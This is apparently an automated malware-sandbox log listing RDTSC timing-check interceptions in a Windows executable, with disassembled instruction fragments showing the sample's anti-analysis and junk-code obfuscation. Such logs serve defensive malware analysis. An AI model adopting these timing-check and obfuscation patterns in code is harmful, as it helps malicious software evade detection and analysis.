Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BBA199 second address: BBA1B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FA6CC859ED3h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BBA1B2 second address: BBA1B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BBFE4C second address: BBFE52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BC8C5F second address: BC8C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BC8C63 second address: BC8C80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA6CC859ED3h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BC8AC4 second address: BC8AD8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA6CD35B916h 0x00000008 jg 00007FA6CD35B916h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BC8AD8 second address: BC8AE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ECAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BCBC29 second address: BCBC40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA6CD35B91Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BD2A17 second address: BD2A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BD1431 second address: BD1451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6CD35B928h 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BD16F1 second address: BD1702 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA6CC859ECCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BD19F0 second address: BD19F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BD19F7 second address: BD19FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BD1B55 second address: BD1B7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FA6CD35B916h 0x00000009 jmp 00007FA6CD35B928h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BD4007 second address: BD402D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FA6CC859ECBh 0x0000000a pushad 0x0000000b jno 00007FA6CC859EC6h 0x00000011 push edi 0x00000012 pop edi 0x00000013 jng 00007FA6CC859EC6h 0x00000019 push eax 0x0000001a pop eax 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BD402D second address: BD4031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BD4031 second address: BD4048 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA6CC859EC6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007FA6CC859EC6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BD4048 second address: BD405D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B921h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BD405D second address: BD406D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FA6CC859EC6h 0x0000000a jne 00007FA6CC859EC6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BD406D second address: BD4071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BD7153 second address: BD7159 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BD6E3D second address: BD6E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BD6E41 second address: BD6E66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ECBh 0x00000007 jmp 00007FA6CC859ECEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007FA6CC859EC6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BD6E66 second address: BD6E92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B925h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a pushad 0x0000000b jmp 00007FA6CD35B91Eh 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: C150EA second address: C150F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: C150F0 second address: C1510B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6CD35B927h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: C1510B second address: C15114 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: C15114 second address: C1511A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: C1511A second address: C1513A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FA6CC859ED4h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: C1513A second address: C15152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6CD35B920h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: C15152 second address: C15159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: C175A1 second address: C175A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CEDEBA second address: CEDEDD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FA6CC859ED4h 0x0000000c jg 00007FA6CC859EC6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CEDEDD second address: CEDEF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA6CD35B921h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CEDEF6 second address: CEDEFB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CEDEFB second address: CEDF01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CEE45C second address: CEE462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CEE462 second address: CEE46B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CEE46B second address: CEE475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA6CC859EC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CEE5C5 second address: CEE5CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CEE5CE second address: CEE5D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CEE5D4 second address: CEE5D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CEE5D8 second address: CEE5E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CEE5E1 second address: CEE5F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CEE5F0 second address: CEE5F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CEE5F4 second address: CEE621 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA6CD35B91Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FA6CD35B925h 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CF2B2C second address: CF2B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CF4422 second address: CF4433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6CD35B91Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CF5E8F second address: CF5E93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CF5E93 second address: CF5E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE001E second address: 6FE0022 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0022 second address: 6FE0028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0028 second address: 6FE0054 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ECEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA6CC859ED7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0054 second address: 6FE006C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6CD35B924h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE006C second address: 6FE0070 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0070 second address: 6FE00E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FA6CD35B91Eh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FA6CD35B920h 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 jmp 00007FA6CD35B91Eh 0x0000001c movzx esi, bx 0x0000001f popad 0x00000020 mov eax, dword ptr fs:[00000030h] 0x00000026 pushad 0x00000027 call 00007FA6CD35B923h 0x0000002c pushad 0x0000002d popad 0x0000002e pop eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FA6CD35B925h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE00E1 second address: 6FE012C instructions: 0x00000000 rdtsc 0x00000002 mov edx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 sub esp, 18h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FA6CC859ECFh 0x00000013 sbb al, FFFFFFAEh 0x00000016 jmp 00007FA6CC859ED9h 0x0000001b popfd 0x0000001c jmp 00007FA6CC859ED0h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE012C second address: 6FE0133 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0133 second address: 6FE0199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 jmp 00007FA6CC859ED6h 0x0000000d mov dword ptr [esp], ebx 0x00000010 jmp 00007FA6CC859ED0h 0x00000015 mov ebx, dword ptr [eax+10h] 0x00000018 jmp 00007FA6CC859ED0h 0x0000001d xchg eax, esi 0x0000001e pushad 0x0000001f mov di, ax 0x00000022 push esi 0x00000023 mov al, bh 0x00000025 pop eax 0x00000026 popad 0x00000027 push eax 0x00000028 jmp 00007FA6CC859ED0h 0x0000002d xchg eax, esi 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0199 second address: 6FE019D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE019D second address: 6FE01BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ED9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE01BA second address: 6FE01CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6CD35B91Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE01CA second address: 6FE0212 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ECBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [756006ECh] 0x00000011 jmp 00007FA6CC859ED6h 0x00000016 test esi, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FA6CC859ED7h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0212 second address: 6FE0218 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0218 second address: 6FE021C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE021C second address: 6FE02A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FA6CD35C901h 0x0000000e jmp 00007FA6CD35B927h 0x00000013 xchg eax, edi 0x00000014 pushad 0x00000015 movzx ecx, bx 0x00000018 mov bh, FCh 0x0000001a popad 0x0000001b push eax 0x0000001c jmp 00007FA6CD35B923h 0x00000021 xchg eax, edi 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FA6CD35B924h 0x00000029 or esi, 3F089288h 0x0000002f jmp 00007FA6CD35B91Bh 0x00000034 popfd 0x00000035 popad 0x00000036 call dword ptr [755D0B60h] 0x0000003c mov eax, 7696E5E0h 0x00000041 ret 0x00000042 pushad 0x00000043 call 00007FA6CD35B91Bh 0x00000048 mov bx, si 0x0000004b pop eax 0x0000004c mov ch, bh 0x0000004e popad 0x0000004f push 00000044h 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE02A8 second address: 6FE02AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE02AE second address: 6FE02B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE02B4 second address: 6FE02B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE02B8 second address: 6FE02FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FA6CD35B91Bh 0x00000012 or ah, FFFFFFDEh 0x00000015 jmp 00007FA6CD35B929h 0x0000001a popfd 0x0000001b call 00007FA6CD35B920h 0x00000020 pop esi 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE02FF second address: 6FE0305 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0305 second address: 6FE0309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0309 second address: 6FE037D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ECAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c pushad 0x0000000d mov edi, 04228420h 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007FA6CC859ED6h 0x00000019 xchg eax, edi 0x0000001a jmp 00007FA6CC859ED0h 0x0000001f push dword ptr [eax] 0x00000021 pushad 0x00000022 call 00007FA6CC859ECEh 0x00000027 mov di, si 0x0000002a pop esi 0x0000002b mov ecx, edi 0x0000002d popad 0x0000002e mov eax, dword ptr fs:[00000030h] 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FA6CC859ED4h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE037D second address: 6FE0393 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA6CD35B921h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0410 second address: 6FE0416 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE1550 second address: 6FE1556 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE1556 second address: 6FE15F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA6CD35B922h 0x00000009 and cl, FFFFFFF8h 0x0000000c jmp 00007FA6CD35B91Bh 0x00000011 popfd 0x00000012 mov edi, esi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ax, word ptr [esi+30h] 0x0000001b jmp 00007FA6CD35B922h 0x00000020 mov word ptr [edx+30h], ax 0x00000024 jmp 00007FA6CD35B920h 0x00000029 mov ax, word ptr [esi+32h] 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FA6CD35B91Dh 0x00000036 and ax, B6F6h 0x0000003b jmp 00007FA6CD35B921h 0x00000040 popfd 0x00000041 pushfd 0x00000042 jmp 00007FA6CD35B920h 0x00000047 and cl, 00000018h 0x0000004a jmp 00007FA6CD35B91Bh 0x0000004f popfd 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE15F7 second address: 6FE15FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE15FD second address: 6FE1601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE1601 second address: 6FE163D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ECBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov word ptr [edx+32h], ax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007FA6CC859ECBh 0x00000017 jmp 00007FA6CC859ED8h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE163D second address: 6FE1733 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA6CD35B921h 0x00000009 xor ax, 35C6h 0x0000000e jmp 00007FA6CD35B921h 0x00000013 popfd 0x00000014 mov ecx, 6D39C277h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov eax, dword ptr [esi+34h] 0x0000001f pushad 0x00000020 mov bx, si 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FA6CD35B922h 0x0000002a and ecx, 0C196198h 0x00000030 jmp 00007FA6CD35B91Bh 0x00000035 popfd 0x00000036 jmp 00007FA6CD35B928h 0x0000003b popad 0x0000003c popad 0x0000003d mov dword ptr [edx+34h], eax 0x00000040 jmp 00007FA6CD35B920h 0x00000045 test ecx, 00000700h 0x0000004b jmp 00007FA6CD35B920h 0x00000050 jne 00007FA73B8F994Ch 0x00000056 pushad 0x00000057 mov cx, B9EDh 0x0000005b pushfd 0x0000005c jmp 00007FA6CD35B91Ah 0x00000061 or ah, FFFFFF88h 0x00000064 jmp 00007FA6CD35B91Bh 0x00000069 popfd 0x0000006a popad 0x0000006b or dword ptr [edx+38h], FFFFFFFFh 0x0000006f jmp 00007FA6CD35B926h 0x00000074 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000078 push eax 0x00000079 push edx 0x0000007a push eax 0x0000007b push edx 0x0000007c jmp 00007FA6CD35B91Ah 0x00000081 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE1733 second address: 6FE1739 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
